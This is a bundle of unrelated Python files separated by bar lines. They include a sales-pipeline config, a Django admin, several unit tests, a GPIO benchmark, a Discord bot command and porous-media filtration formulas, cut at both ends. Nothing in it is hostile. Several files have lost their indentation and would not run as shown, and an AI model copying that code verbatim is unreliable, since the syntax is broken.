"subcanal_transformado",
"segmento",
"segmento_transformado",
"sep11",
"sep12",
"sep13",
"sep14",
# driver 2
"formato_orig",
"canal_transformado2",
"subcanal_transformado2",
"segmento2",
"agrupacion",
"formato",
"sep15",
"sep16",
"sep17",
# driver 3
"actual_codigo_ac",
"cod_ac_reemplazar",
"sep18",
"sep19",
# driver 4
"codigo_cliente",
"nombre_cliente",
"oficina_ventas_ecom"
],
"converters": {
"id_consecutivo": func.mask_number,
"actual_codigo_ac": func.mask_number,
"cod_ac_reemplazar": func.mask_number,
"codigo_cliente": func.mask_number
}
}
PROCESSES = {
"formula": {
"directa": {
"key_columns": ["sector", "categoria", "sub_categoria", "linea", "marca"],
"key_column_name": "clave",
"columns_change": ['sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
"extra_columns": ['agrupacion', 'formato'],
"key_merge_extra_columns": "tipologia",
"filter_add_columns": {"column": "formato", "pattern": "(?i)sin asignar"},
"add_columns": ['canal', 'sub_canal', 'segmento', 'agrupacion', 'formato'],
"add_columns_dif": "trans_",
"key_merge_add_columns":"formato_orig",
"validate_nan_columns": "all",
"agg_columns": ["cod_oficina", "oficina_venta", "canal", "sub_canal", "tipologia",
                        # same columns as add_columns, prefixed with add_columns_dif ("trans_")
"trans_canal", "trans_sub_canal", "trans_segmento", "trans_agrupacion", "trans_formato",
"sector", "categoria", "sub_categoria", "linea", "marca", # same key columns
"mes"],
"agg_values": [
{"col_res": "sum_venta_actual",
"column": "venta_nta_acum_anio_actual"},
{"col_res": "sum_venta_ppto", "column": "ppto_nta_acum_anio_actual"},
{"col_res": "sum_venta_anterior",
"column": "venta_nta_acum_anio_anterior"}
]
},
"calle": {
"key_columns": ["sector", "categoria", "sub_categoria", "linea", "marca"],
"key_column_name": "clave",
"columns_change": ['sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
"extra_columns": ['agrupacion', 'formato'],
"key_merge_extra_columns": "tipologia",
"new_columns": ['nombre_ac', 'oficina_venta'],
"add_columns": ['canal', 'sub_canal', 'segmento', 'agrupacion', 'formato'],
"add_columns_dif": "trans_",
"filter_replace_columns": {"column": "tipologia", "pattern": "(?i)sin asignar"},
"replace_columns_for": {"cod_canal": "T", "canal": "Tradicional", "cod_sub_canal": "TD", "sub_canal": "Tiendas", "cod_tipologia": "TG", "tipologia": "Tienda Mixta"},
"validate_nan_columns": "all",
"agg_columns": ["oficina_venta", "canal", "sub_canal", "tipologia", "cod_agente_comercial", "nombre_ac",
                        # same columns as add_columns, prefixed with add_columns_dif ("trans_")
"trans_canal", "trans_sub_canal", "trans_segmento",
"sector", "categoria", "sub_categoria", "linea", "marca", # same key columns
"mes"],
"agg_values": [
{"col_res": "sum_venta_actual",
"column": "venta_nta_acum_anio_actual"},
{"col_res": "sum_venta_ppto", "column": "ppto_nta_acum_anio_actual"},
{"col_res": "sum_venta_anterior",
"column": "venta_nta_acum_anio_anterior"}
]
},
"compra": {
"key_columns": ["sector", "categoria", "sub_categoria", "linea", "marca"],
"key_column_name": "clave",
"columns_change": ['sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
"validate_nan_columns": "all",
"agg_columns": ["oficina_venta", "cod_agente",
"sector", "categoria", "sub_categoria", "linea", "marca", # same key columns
"mes"],
"agg_values": [
{"col_res": "sum_venta_actual",
"column": "venta_nta_acum_anio_actual"},
{"col_res": "sum_venta_ppto", "column": "ppto_nta_acum_anio_actual"},
{"col_res": "sum_venta_anterior",
"column": "venta_nta_acum_anio_anterior"}
]
},
"driver": {
# same size and same order in all properties of this object
"index_sub_drivers": [0, 1, 2, 3, 4],
"cols_required_sub_drivers": [[15, 17, 19, 21, 23], [3, 5, 7], [1, 2, 3, 4, 5], [0, 1], [0, 1, 2]],
"subset_index_columns": [None, 'tipologia', 'formato_orig', 'actual_codigo_ac', 'codigo_cliente'],
"drop_duplicates": [False, True, True, True, True]
}
},
"assignment": {
"directa": {
"filter_assignment": {"column": "categoria", "pattern": "(?i)sin asignar"},
"filter_sector": {
"column": "sector",
"pattern": "(?i)helados|otros no operacional|otros oper no ccial|servicios"
},
"agg_values": {
"actual":{"cols_res": ["total_venta_act_asignada",
"total_venta_act_sin_asignar"], "column": "sum_venta_actual"},
"anterior": {"cols_res": ["total_venta_ant_asignada", "total_venta_ant_sin_asignar"],
"column": "sum_venta_anterior"}
},
"add_columns": ["porc_participacion"],
"permissible_diff_totals": 1000,
"levels": [["oficina_venta", "trans_segmento", "trans_agrupacion", "trans_formato", "sector", "mes"],
["oficina_venta", "trans_segmento", "trans_agrupacion", "trans_formato", "sector"],
["oficina_venta", "sector"]],
"unique_columns": ["cod_oficina", "oficina_venta", "canal", "sub_canal", "tipologia",
"trans_canal", "trans_sub_canal", "trans_segmento", "trans_agrupacion", "trans_formato",
"sector", "categoria", "sub_categoria", "linea", "marca",
"mes"]
},
"compra": {
"filter_assignment": {"column": "categoria", "pattern": "(?i)sin asignar"},
"filter_sector": {
"column": "sector",
"pattern": "(?i)helados|otros no operacional|otros oper no ccial|servicios"
},
"agg_values": {
"actual":{"cols_res": ["total_venta_act_asignada",
"total_venta_act_sin_asignar"], "column": "sum_venta_actual"},
"anterior": {"cols_res": ["total_venta_ant_asignada",
"total_venta_ant_sin_asignar"], "column": "sum_venta_anterior"}
},
"add_columns": ["porc_participacion"],
"permissible_diff_totals": 1000,
"levels": [["oficina_venta", "cod_agente", "sector", "mes"],
["oficina_venta", "cod_agente", "sector"],
["oficina_venta", "cod_agente"]],
"unique_columns":["oficina_venta", "cod_agente",
"sector", "categoria", "sub_categoria", "linea", "marca",
"mes"]
},
},
"consolidation":{
"compra": {
"group_sales_by": [ "oficina_venta", "cod_agente", "sector", "categoria", "sub_categoria", "linea", "marca", "mes"],
"no_required_columns":{
"actual": ["sum_venta_anterior"],
"anterior": ["sum_venta_ppto", "sum_venta_actual"]
},
"validate_nan": "sum_venta_anterior",
"type_sales": ["actual", "anterior", "presupuesto"],
"actual": {
"agg_columns":[
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'tipologia'],
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
["oficina_venta", "cod_agente", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'mes', 'tipologia'],
],
"agg_values": [
{"col_res": "sum_segmento_actual", "column": "sum_venta_actual"},
{"col_res": "total_segmento_actual", "column": "sum_segmento_actual"},
{"col_res": "ventas", "column": "ventas_a_calle"}
],
},
"anterior": {
"agg_columns":[
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'tipologia'],
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
["oficina_venta", "cod_agente", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'mes', 'tipologia'],
],
"agg_values": [
{"col_res": "sum_segmento_anterior", "column": "sum_venta_anterior"},
{"col_res": "total_segmento_anterior", "column": "sum_segmento_anterior"},
{"col_res": "ventas_anterior", "column": "ventas_a_calle"}
],
},
"presupuesto": {
"agg_columns":[
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'tipologia'],
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
["oficina_venta", "cod_agente", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'mes', 'tipologia'],
],
"agg_values": [
{"col_res": "sum_segmento_ppto", "column": "sum_venta_ppto"},
{"col_res": "total_segmento_ppto", "column": "sum_segmento_ppto"},
{"col_res": "ppto", "column": "ventas_a_calle"}
],
},
"merge":{
"left": ['oficina_venta', 'cod_agente', 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'], #compra columns
"right": ['oficina_venta', 'cod_agente_comercial', 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'] #aux afo(calle) columns
},
"add_column": "ventas_a_calle",
"unsold": {
"column": "tipologia",
"value": "Tienda Mixta"
},
"merge_final":{
"found_columns": ["canal", "sub_canal", "trans_canal", "trans_sub_canal", "trans_segmento"],
"found_by": "tipologia"
},
"permissible_diff_porc": 0.01,
}
}
}
# routes
PRINCIPAL_FILE_SOURCE = ""
ROOT_DIR = path.abspath(
path.join(__file__, "../../..")
) if ENVIROMENT == "DEV" else getcwd()
ALERTS_DIR = path.normpath(path.join(ROOT_DIR, "files/alerts"))
|
def areParanthesisBalanced(expr):
    s = []
    # Go through the expression character by character
    for ch in expr:
        if ch == '(' or ch == '[' or ch == '{':
            # Push the opening bracket onto the stack
            s.append(ch)
            continue
        # If the current character is not an opening bracket, it must be a
        # closing one, so the stack cannot be empty at this point.
        if len(s) == 0:
            return False
        # Pop the most recent opening bracket and check that it matches
        x = s.pop()
        if ch == ')' and x != '(':
            return False
        elif ch == '}' and x != '{':
            return False
        elif ch == ']' and x != '[':
            return False
    # Balanced only if no unmatched opening brackets remain
    return len(s) == 0
# Driver code to send the input expression
if __name__ == "__main__":
    expr = "{()}[]"
    if areParanthesisBalanced(expr):
        print("Balanced")
    else:
        print("Not Balanced") |
import numpy as np
def polar2cart(ra,dec):
x = np.cos(np.deg2rad(ra)) * np.cos(np.deg2rad(dec))
y = np.sin(np.deg2rad(ra)) * np.cos(np.deg2rad(dec))
z = np.sin(np.deg2rad(dec))
return np.array([x,y,z])
def cart2polar(vector):
ra = np.arctan2(vector[1],vector[0])
dec = np.arcsin(vector[2])
return np.rad2deg(ra), np.rad2deg(dec)
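# Minimal round-trip check (illustrative): converting to Cartesian and back
# should recover the original coordinates up to floating-point error.
if __name__ == '__main__':
    ra, dec = 45.0, 30.0
    print(cart2polar(polar2cart(ra, dec)))  # ~ (45.0, 30.0)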
|
from SurPyval.samplers.sampler import Sampler
class EmceeSampler(Sampler):
def __init__(self, sampler, pos):
self.sampler = sampler
self.pos = pos
def sample(self, n_samples):
self.sampler.reset()
self.sampler.run_mcmc(self.pos, n_samples)
return self.sampler.flatchain
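# Illustrative usage (assumes an emcee.EnsembleSampler instance `sampler` and
# initial walker positions `pos`; both are placeholders, not defined here):
#   flat_chain = EmceeSampler(sampler, pos).sample(n_samples=1000)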
|
from django.contrib.gis import admin
from django.contrib.auth.admin import UserAdmin
from import_export import resources # type: ignore
from import_export.admin import ImportExportModelAdmin # type: ignore
from .models import (
Species,
Observation,
DataImport,
User,
Dataset,
ObservationComment,
Area,
ObservationView,
Alert,
)
admin.site.site_header = "LIFE RIPARIAS early warning administration"
@admin.register(User)
class RipariasUserAdmin(UserAdmin):
pass
class ObservationCommentCommentInline(admin.TabularInline):
model = ObservationComment
class ObservationViewInline(admin.TabularInline):
model = ObservationView
readonly_fields = ["user", "timestamp"]
# Make that inline read-only
def has_change_permission(self, request, obj=None):
return False
def has_add_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
@admin.register(Observation)
class ObservationAdmin(admin.OSMGeoAdmin):
list_display = ("stable_id", "date", "species", "source_dataset")
list_filter = ["data_import"]
inlines = [ObservationCommentCommentInline, ObservationViewInline]
class SpeciesResource(resources.ModelResource):
class Meta:
model = Species
@admin.register(Species)
class SpeciesAdmin(ImportExportModelAdmin):
resource_class = SpeciesResource
@admin.register(DataImport)
class DataImportAdmin(admin.ModelAdmin):
list_display = ("pk", "start", "imported_observations_counter")
@admin.register(Dataset)
class DatasetAdmin(admin.ModelAdmin):
pass
@admin.register(Area)
class AreaAdmin(admin.OSMGeoAdmin):
list_display = ("name", "owner")
@admin.register(Alert)
class AlertAdmin(admin.ModelAdmin):
pass
|
import salt.utils.xmlutil as xmlutil
from salt._compat import ElementTree as ET
def append_to_XMLDesc(mocked, fragment):
"""
Append an XML fragment at the end of the mocked XMLDesc return_value of mocked.
"""
xml_doc = ET.fromstring(mocked.XMLDesc())
xml_fragment = ET.fromstring(fragment)
xml_doc.append(xml_fragment)
mocked.XMLDesc.return_value = ET.tostring(xml_doc)
def assert_xml_equals(expected, actual):
"""
Assert that two ElementTree nodes are equal
"""
assert xmlutil.to_dict(xmlutil.strip_spaces(expected), True) == xmlutil.to_dict(
xmlutil.strip_spaces(actual), True
)
def strip_xml(xml_str):
"""
Remove all spaces and formatting from an XML string
"""
return ET.tostring(xmlutil.strip_spaces(ET.fromstring(xml_str)))
def assert_called(mock, condition):
    """
    Assert that the mock has been called if and only if `condition` is true.
    """
    assert bool(mock.called) == bool(condition)
def assert_equal_unit(actual, expected, unit="KiB"):
"""
Assert that two ElementTree nodes have the same value and unit
"""
assert actual.get("unit") == unit
assert actual.text == str(expected)
|
import numpy as np
################################################
# fitness functions #
################################################
def one_max(chromosome):
return np.sum(chromosome)
def labs(chromosome):
new_chrom = [-1 if x == 0 else 1 for x in chromosome]
N = len(new_chrom)
correlations = [sum([new_chrom[i] * new_chrom[i+k] for i in range(0, N - k)]) for k in range(N)]
return sum([x**2 for x in correlations[1:]])
def sphere(chromosome, offset=None):
if offset is None:
offset = np.ones(chromosome.size)
return np.sum((chromosome - offset) ** 2)
def rosenbrock(chromosome):
return np.sum(100 * (chromosome[1:] - chromosome[:-1] ** 2) ** 2 + (1 - chromosome[:-1]) ** 2)
def linear(chromosome, a0=1, ai=None):
if ai is None:
ai = np.ones(chromosome.size)
return a0 + np.sum(ai * chromosome)
def step(chromosome, a0=1, ai=None):
if ai is None:
ai = np.ones(chromosome.size)
return a0 + np.sum(np.floor(ai * chromosome))
def rastrigin(chromosome):
return 10 * chromosome.size + np.sum(chromosome ** 2 - 10 * np.cos(2 * np.pi * chromosome))
def griewank(chromosome):
return 1 + np.sum(chromosome ** 2) / 4000 - np.prod(np.cos(chromosome / np.sqrt(np.arange(1, chromosome.size + 1))))
def schwefel(chromosome):
return - np.sum(chromosome * np.sin(np.sqrt(np.abs(chromosome))))
################################################
# perturbation functions #
################################################
def bits_inversion(chromosome, probability=0.1):
return chromosome ^ np.random.binomial(1, probability, chromosome.size)
def normal_distribution_addition(chromosome, variation=2):
return chromosome + np.random.normal(0, variation, chromosome.size)
def cauchy_distribution_addition(chromosome):
return chromosome + np.random.standard_cauchy(chromosome.size)
################################################
# others #
################################################
def bin2realXD(chromosome, lu_bound=([0], [1])):
lower_bounds = lu_bound[0]
upper_bounds = lu_bound[1]
if not float.is_integer(chromosome.size / len(lower_bounds)):
print("The binary vector length is not divisible by the dimensionality of the target vector space.")
return None
chunks = np.array_split(chromosome, len(lower_bounds))
max_num = 2 ** chunks[0].size - 1
result = []
for i, chunk in enumerate(chunks):
lb = lower_bounds[i]
ub = upper_bounds[i]
num = int("".join(str(i) for i in chunk), 2)
real_num = num / max_num
result.append(real_num * (ub - lb) + lb)
return result
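# Example: bin2realXD(np.array([1, 0, 0, 0, 0, 0, 0, 1]), ([0, -5], [1, 5]))
# splits the bits into two 4-bit chunks and decodes them to
# [8/15 * 1 + 0, 1/15 * 10 - 5] ~= [0.533, -4.333]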
# (1+1)-ES with 1/5 rule
def ES(init_chromosome, objective_f, iterations):
best_chromosome = init_chromosome
best_fitness = objective_f(best_chromosome)
i = 0
sigma = 1
while i < iterations:
chromosome = best_chromosome + sigma * np.random.normal(0, 2, init_chromosome.size)
fitness = objective_f(chromosome)
b = fitness < best_fitness
sigma *= np.exp(int(b) - 1/5) ** (1 / init_chromosome.size)
if b:
best_fitness = fitness
best_chromosome = chromosome
i += 1
return best_chromosome, best_fitness
def local_search_first_improving(init_chromosome, objective_f, perturbation_f, iterations):
best_chromosome = init_chromosome
best_fitness = objective_f(best_chromosome)
i = 0
while i < iterations:
chromosome = perturbation_f(best_chromosome)
fitness = objective_f(chromosome)
if fitness < best_fitness:
best_fitness = fitness
best_chromosome = chromosome
i += 1
return best_chromosome, best_fitness
def fitness_function_test(test_file, test_function):
f = open(test_file, "r")
lines = f.readlines()
f.close()
for line in lines:
if line.startswith('#'):
continue
chromosome = np.array(list(map(float, line.split(':')[0].split())))
print(f'{chromosome} : {test_function(chromosome)}')
if __name__ == "__main__":
# fitness_function_test("./rastrigin.txt", rastrigin)
init_chromosome = np.random.normal(0, 2, 10)
print(ES(init_chromosome, sphere, 1000))
|
'''
Check mesh constraints
'''
import unittest
import numpy.testing as nptest
import numpy as np
import scipy.linalg as lin
import mesh
from angle_area import is_angle_satisfied, is_area_satisfied
rtol = 10 ** - 8
atol = 10 ** - 8
class TestCircleRefinement(unittest.TestCase):
def test_mesh(self):
center = 5, 4
radius = 7
max_area = 5
region = mesh.RefinementCircle(center, radius, max_area)
coords, trias = region.produce_mesh()
x0, y0 = center
for x, y in coords:
            assert ((x - x0) ** 2 + (y - y0) ** 2) < radius ** 2 * (1 + rtol) ** 2
self.assertTrue(is_area_satisfied(coords, trias, max_area))
self.assertTrue(is_angle_satisfied(coords, trias))
def test_distance_point(self):
center = 100, -5.2
radius = 3
max_area = 1.3
region = mesh.RefinementCircle(center, radius, max_area)
point = 100, 0
dist_actual = region.distance_to_point(point)
dist_desired = 2.2
nptest.assert_allclose(dist_actual, dist_desired, rtol=rtol, atol=atol)
def test_distance_region(self):
center = 0, -3.1
radius = 3
max_area = 1.3
region1 = mesh.RefinementCircle(center, radius, max_area)
# Test distance to a different region
translation = 10, -10
center2 = np.array(center) + translation
radius2 = 5
region2 = mesh.RefinementCircle(center2, radius2, max_area)
dist_reg_1 = region1.distance_to_region(region2)
dist_reg_2 = region2.distance_to_region(region1)
desired_dist = lin.norm(translation) - radius - radius2
nptest.assert_allclose(dist_reg_1, dist_reg_2, rtol=rtol, atol=atol)
nptest.assert_allclose(dist_reg_1, desired_dist, rtol=rtol, atol=atol)
# Also check distance to itself
dist_reg_1_self = region1.distance_to_region(region1)
nptest.assert_allclose(dist_reg_1_self, 0, atol=atol)
class TestManyRegionRefinement(unittest.TestCase):
def test_empty(self):
region = mesh.RefinementMany([])
coords, trias = region.produce_mesh()
self.assertEqual(coords, [])
self.assertEqual(trias, [])
self.assertAlmostEqual(region.distance_to_point([1, 2]), np.inf)
def test_many_circles(self):
centers = [(0, 0), (0, 10), (10, 0)]
radii = [1, 2, 4]
max_areas = [0.3, 0.8, 1.5]
circles = []
for i, center in enumerate(centers):
circles.append(mesh.RefinementCircle(center, radii[i], max_areas[i]))
region = mesh.RefinementMany(circles)
coords, trias = region.produce_mesh()
self.assertTrue(is_area_satisfied(coords, trias, max(max_areas)))
self.assertTrue(is_angle_satisfied(coords, trias))
def test_exception_thrown(self):
centers = [(0, 0), (0, 10), (17, 0)]
radii = [1, 10, 4]
max_areas = [0.3, 0.8, 1.5]
circles = []
for i, center in enumerate(centers):
circles.append(mesh.RefinementCircle(center, radii[i], max_areas[i]))
region = mesh.RefinementMany(circles)
with self.assertRaises(NotImplementedError):
region.produce_mesh() |
#!/bin/python
import time, mmap, ctypes
with open('/dev/mem', 'r+b') as fd:
region = mmap.mmap(fd.fileno(), (1024*4), offset=0xFF634000)
ctypes.c_uint32.from_buffer(region, 0x116 * 4).value = 0
ctypes.c_uint32.from_buffer(region, 0x14A * 4).value = 0
pin = ctypes.c_uint32.from_buffer(region, 0x117 * 4)
pof = 0
pon = 1
ps = time.process_time()
for i in range(1000000):
pin.value = pof
pin.value = pon
pe = time.process_time()
print("Total time for ctype loop: ", round(pe-ps, 3))
#CTYPES
# #read
# ctypes.c_uint32.from_buffer(region, (offset*4)).value
#
# test = ctypes.c_uint32.from_buffer(region, (offset*4)).value ^ (1<<2)
#
# #write
# ctypes.c_uint32.from_buffer(region, (offset*4)).value = test
|
from unittest import mock
from onap_data_provider.resources.line_of_business_resource import (
LineOfBusinessResource,
ResourceNotFound,
)
LINE_OF_BUSINESS = {"name": "test-name"}
@mock.patch(
"onap_data_provider.resources.line_of_business_resource.LineOfBusiness.get_by_name"
)
def test_line_of_business_resource_line_of_business_property(mock_get_by_name):
lob = LineOfBusinessResource(LINE_OF_BUSINESS)
mock_get_by_name.side_effect = ResourceNotFound
assert lob.line_of_business is None
mock_get_by_name.side_effect = None
assert lob.line_of_business is not None
@mock.patch(
"onap_data_provider.resources.line_of_business_resource.LineOfBusinessResource.line_of_business",
new_callable=mock.PropertyMock,
)
def test_line_of_business_resource_exists(mock_line_of_business):
lob = LineOfBusinessResource(LINE_OF_BUSINESS)
assert lob.exists is True
mock_line_of_business.return_value = None
assert lob.exists is False
@mock.patch(
"onap_data_provider.resources.line_of_business_resource.LineOfBusinessResource.exists",
new_callable=mock.PropertyMock,
)
@mock.patch(
"onap_data_provider.resources.line_of_business_resource.LineOfBusiness.send_message"
)
def test_line_of_business_create(mock_send_message, mock_exists):
mock_exists.return_value = True
lob = LineOfBusinessResource(LINE_OF_BUSINESS)
lob.create()
mock_send_message.assert_not_called()
mock_exists.return_value = False
lob.create()
mock_send_message.assert_called()
|
from datetime import datetime
import hikari
import tanjun
from avgamah.core.client import Client
from avgamah.utils.buttons import DELETE_ROW
serverinfo_component = tanjun.Component()
@serverinfo_component.with_slash_command
@tanjun.as_slash_command("serverinfo", "Get info about the server.")
async def serverinfo_command(ctx: tanjun.abc.Context) -> None:
guild = await ctx.fetch_guild()
embed = hikari.Embed(
color=0xF1C40F,
timestamp=datetime.now().astimezone(),
)
embed.set_author(name=f"Serverinfo of {guild}", icon=guild.icon_url)
fields = [
("ID", ctx.guild_id, True),
("Owner", f"<@{guild.owner_id}>", True),
("Member Count", len(guild.get_members()), True),
(
"Server Creation",
f"<t:{guild.created_at.timestamp():.0f}:F> • <t:{guild.created_at.timestamp():.0f}:R>",
False,
),
("Total Channels", len(guild.get_channels()), True),
("Boost Count", guild.premium_subscription_count, True),
(
"Premium Tier",
str(guild.premium_tier).replace("_", " ").title(),
True,
),
("Role Count", len(guild.get_roles()), True),
(
"Vanity URL",
f"https://discord.gg/{guild.vanity_url_code}"
if guild.vanity_url_code
else "None",
True,
),
]
embed.set_thumbnail(guild.icon_url)
embed.set_footer(text=f"Requested by {ctx.author}", icon=ctx.author.avatar_url)
for name, value, inline in fields:
embed.add_field(name=name, value=value, inline=inline)
if guild.features:
embed.add_field(
name="Features",
value="\n".join(
"• " + feature.replace("_", " ").title() for feature in guild.features
),
)
await ctx.respond(embed=embed, component=DELETE_ROW)
@tanjun.as_loader
def load_components(client: Client):
client.add_component(serverinfo_component.copy())
|
#!/usr/bin/env python3
from setuptools import setup
setup(
name='WordFreq',
version='0.1',
description='Simple natural language word counter',
author='Eivind Fonn',
author_email='evfonn@gmail.com',
license='MIT',
url='https://github.com/TheBB/wordfreq',
py_modules=['wordfreq'],
entry_points={
'console_scripts': [
'wordfreq=wordfreq:wordfreq',
],
},
install_requires=['click', 'nltk'],
)
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests of Pyreach Internal and Timers."""
import math
import os
from typing import Tuple
import unittest
from pyreach import internal
class FakeClock(object):
"""A fake clock class for testing."""
current_time = 0.0
@classmethod
def get_time(cls) -> float:
# Return the increment of time.
cls.current_time += .001 # 1ms
return cls.current_time
class TimersTest(unittest.TestCase):
"""Test the performance timers."""
def test_timers(self) -> None:
"""Test the performance timers."""
os.environ["PYREACH_PERF"] = ""
timers: internal.Timers = internal.Timers(
{"gym", "step", "reset", "host", "arm", "color", "depth", "vacuum"},
get_time=FakeClock.get_time)
# A more interesting test:
with timers.select({"gym", "reset"}):
with timers.select({"!gym", "!reset", "host", "arm"}):
pass
with timers.select({"!gym", "!reset", "host", "color"}):
pass
with timers.select({"!gym", "!reset", "host", "depth"}):
pass
with timers.select({"!gym", "!reset", "host", "vacuum"}):
pass
desired_results = [
("arm", 1, 0.008),
("color", 1, 0.004),
("depth", 1, 0.004),
("gym", 1, 0.018),
("host", 4, 0.016),
("reset", 1, 0.018),
("step", 0, 0.000),
("vacuum", 1, 0.004),
]
results = sorted(timers.results())
errors: int = 0
assert len(desired_results) == len(results), [desired_results, results]
for index, result in enumerate(results):
desired_result: Tuple[str, int, float] = desired_results[index]
assert result[0] == desired_result[0], [result, desired_result]
assert result[1] == desired_result[1], [result, desired_result]
if not math.isclose(result[2], desired_result[2], rel_tol=1.0):
print("Mismatch('{0}'): {1:.7f}, {2:.7f}".format(
result[0], result[2], desired_result[2]))
errors += 1
assert not errors, errors
# Nesting test:
timers = internal.Timers({"gym.arm", "gym.color", "host.arm", "host.color"})
assert timers.enabled() == set(), timers.enabled()
with timers.select({"gym"}):
assert timers.enabled() == {"gym"}, f"got:{timers.enabled()}"
with timers.select({"gym.arm"}):
assert timers.enabled() == {"gym", "gym.arm"}, timers.enabled()
with timers.select({"!gym*", "host.arm"}):
assert timers.enabled() == {"host", "host.arm"}, timers.enabled()
assert timers.enabled() == {"gym", "gym.arm"}, timers.enabled()
with timers.select({"!gym*", "host.color"}):
assert timers.enabled() == {"host", "host.color"}, timers.enabled()
assert timers.enabled() == {"gym", "gym.arm"}, timers.enabled()
assert timers.enabled() == {"gym"}, timers.enabled()
assert timers.enabled() == set(), timers.enabled()
if __name__ == "__main__":
unittest.main()
|
import numpy as np
''' GLOBAL CONSTANTS '''
PI = 3.141592
BOLTZMANN = 1.380649E-23 #N·m/K
g = 9.81 #m/s²
def dispCoef(D_m,alpha_L,U,n=1.0):
'''
Returns
----------
float
Dispersion coefficient $D_T$ [m²/s]
.. math:: D_T = D_m + \\alpha_LU^n
Parameters
----------
D_m : float
        Molecular diffusion coefficient [m²/s]
alpha_L : float
Longitudinal dispersion coefficient [m]
U : float
        Pore-water interstitial velocity [m/s]
n : float
empirical fitting exponent [-]
Notes
----------
It neglects transversal dispersion
'''
return D_m + alpha_L*(U**n)
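# Example: dispCoef(D_m=1e-9, alpha_L=0.01, U=1e-5) -> 1.01e-7 m²/s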
def poreVel(q,theta):
'''
Returns
----------
U : float
        Returns the interstitial flow velocity $U$ (the pore-water velocity), computed from the Darcy velocity
        .. math:: \\vec{U} = \\dfrac{\\vec{q}}{\\theta}
Parameters
----------
q : float
Darcy velocity [m/s]
theta : float (0.,1.)
Porosity [-]
'''
return q/theta
def molecularDiff(visco,dp,T):
'''
Returns
----------
Dm : float
Molecular diffusion coefficient $D_m$ calculated from the Stokes-Einstein equation:
.. math:: D_m = \\dfrac{k_BT}{3\\pi\\eta d_p}
Parameters
----------
visco: float
Fluid dynamic viscosity :math:`\\eta` [N·s/m²]
dp: float
Particle diameter [m]
T : float
Temperature [K]
Notes
----------
- $k_B$ : Boltzmann constant
'''
return (BOLTZMANN*T)/(3*PI*visco*dp)
def collectorEff(etaD,etaI,etaG):
'''
Returns
----------
eta0 : float
        Return the single collector efficiency :math:`\\eta_0`
        .. math:: \\eta_0 = \\eta_{\\rm D} + \\eta_{\\rm I} + \\eta_{\\rm G}
Parameters
----------
    etaD : float
        Collector efficiency due to diffusion [-]
    etaI : float
        Collector efficiency due to direct interception [-]
    etaG : float
        Collector efficiency due to gravitational deposition [-]
'''
return etaD + etaI + etaG
def collectorEfficiency_Diffusion(A_s,N_R,N_Pe,N_vdW):
'''
Returns
----------
etaD : float
        Collector efficiency due to diffusion $\\eta_D$ following the approximation by Tufenkji & Elimelech (2004) [1]
        .. math:: \\eta_{\\rm D} = 2.4 A_s^{1/3}N_{\\rm R}^{-0.081}N_{\\rm Pe}^{-0.715}N_{\\rm vdW}^{0.052}
Parameters
----------
A_s : float
Happel parameter for a collection of spheres [-]
N_R : float
Size ratio [-]
N_Pe : float
Péclet number [-]
N_vdW : float
van der Waals nondimensional number [-]
References:
----------
.. [1] https://pubs.acs.org/doi/10.1021/es034049r
'''
return 2.40 * (A_s**(1./3.)) * (N_R**-0.081) * (N_Pe**-0.715) * (N_vdW**0.052)
def collectorEfficiency_Interception(A_s,N_R,N_Pe,N_vdW):
'''
Returns
----------
etaI : float
        Collector efficiency due to direct interception $\\eta_I$ following the approximation by Tufenkji & Elimelech (2004) [1]
        .. math:: \\eta_{\\rm I} = 0.55 A_sN_{\\rm R}^{1.55}N_{\\rm Pe}^{-0.125}N_{\\rm vdW}^{0.125}
Parameters
----------
A_s : float
Happel parameter for a collection of spheres [-]
N_R : float
Size ratio [-]
N_Pe : float
Péclet number [-]
N_vdW : float
van der Waals nondimensional number [-]
References:
----------
.. [1] https://pubs.acs.org/doi/10.1021/es034049r
'''
return 0.55 * A_s * (N_R**1.55) * (N_Pe**-0.125) * (N_vdW**0.125)
def collectorEfficiency_GDeposition(N_gr,N_R,N_Pe,N_vdW):
'''
Returns
----------
etaG : float
        Collector efficiency due to gravitational deposition $\\eta_G$ following the approximation by Tufenkji & Elimelech (2004) [1]
        .. math:: \\eta_{\\rm G} = 0.475 N_{\\rm gr}^{1.11} N_{\\rm R}^{-1.35}N_{\\rm Pe}^{-1.11}N_{\\rm vdW}^{0.053}
Parameters
----------
N_gr : float
Gravitational number [-]
N_R : float
Size ratio [-]
N_Pe : float
Péclet number [-]
N_vdW : float
van der Waals nondimensional number [-]
References:
----------
.. [1] https://pubs.acs.org/doi/10.1021/es034049r
'''
return 0.475 * (N_gr**1.11) * (N_R**-1.35) * (N_Pe**-1.11) * (N_vdW**0.053)
def happelParameter(theta):
'''
Returns
----------
As : float
Happel parameter for packed spheres
        .. math:: A_s = \\dfrac{2(1-s^{5/3})}{2-3s^{1/3}+3s^{5/3}-2s^2}, \\quad s = 1-\\theta
Parameters
----------
theta : float (0.,1.)
Porosity [-]
'''
s = 1-theta
s53 = s**(5./3.)
s13 = s**(1./3.)
s21 = s**2
return (2*(1-s53))/(2 - (3*s13) + (3*s53) - (2*s21))
def noDim_SizeRatio(dp,dc):
'''
